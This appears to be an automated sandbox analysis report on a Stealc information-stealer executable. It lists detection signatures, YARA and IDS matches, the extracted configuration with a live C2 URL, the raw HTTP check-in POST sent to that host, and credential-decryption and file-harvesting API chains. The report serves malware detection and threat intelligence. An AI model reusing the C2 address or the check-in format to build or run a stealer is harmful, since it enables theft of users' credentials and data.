Edit tour

Windows Analysis Report
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Overview

General Information

Sample name:	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
Analysis ID:	1528595
MD5:	e35c6ad41081ddcda2ba9c65b5b1a6f8
SHA1:	e675ad90c164244bac1c3a5cbacc932e9e0b3a8d
SHA256:	100f1c346cbcff15f4d9d75c791000625850e1c82b44ce9427ccf441f5c3cb79
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Machine Learning detection for sample

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe" MD5: E35C6AD41081DDCDA2BA9C65B5B1A6F8)

WerFault.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x226c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T03:52:04.363921+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	62.204.41.150	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Multi AV Scanner detection for domain / URL

Source: http://62.204.41.150	Virustotal: Detection: 9%	Perma Link
Source: http://62.204.41.150/	Virustotal: Detection: 9%	Perma Link
Source: http://62.204.41.150/edd20096ecef326d.php	Virustotal: Detection: 12%	Perma Link
Source: http://62.204.41.150/ows	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for submitted file

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	ReversingLabs: Detection: 28%
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Virustotal: Detection: 37%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	0_2_0040C820
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407240
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409AC0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00418EA0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409B60
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_022ACA87
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_022A74A7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_022A9D27
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_022B9107
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_022A9DC7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Unpacked PE file: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E430
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004138B0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00414570
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414910
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040ED20
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE70
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DE10
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004016D0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DA80
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00413EA0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F6B0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_022AE697
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_022B3B17
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022B4B77
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_022AEF87
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_022B47D7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022AE077
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_022ADCE7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AF8F1 FindFirstFileA,	0_2_022AF8F1
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_022AC0D7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022A1937
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_022B4107
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022AF917

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 62.204.41.150Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 41 30 32 44 45 30 34 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"4BBA02DE0439786254513------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"default6_cap------GCGHCBKFCFBFHIDHDBFC--

Source: Joe Sandbox View

IP Address: 62.204.41.150 62.204.41.150

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,HeapCreate,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00404880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 62.204.41.150Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 41 30 32 44 45 30 34 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"4BBA02DE0439786254513------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"default6_cap------GCGHCBKFCFBFHIDHDBFC--

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204081074.000000000073E000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/0
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php)
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php?
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpL
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpl
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpo
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/ows
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: String function: 004045C0 appears 317 times

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00419600

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413720

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\5YWSW8ED.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d0253710-21c3-4f21-aed6-9a7924c91d3a

Jump to behavior

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	ReversingLabs: Detection: 28%
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe "C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe"
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: msvcr100.dll	Jump to behavior
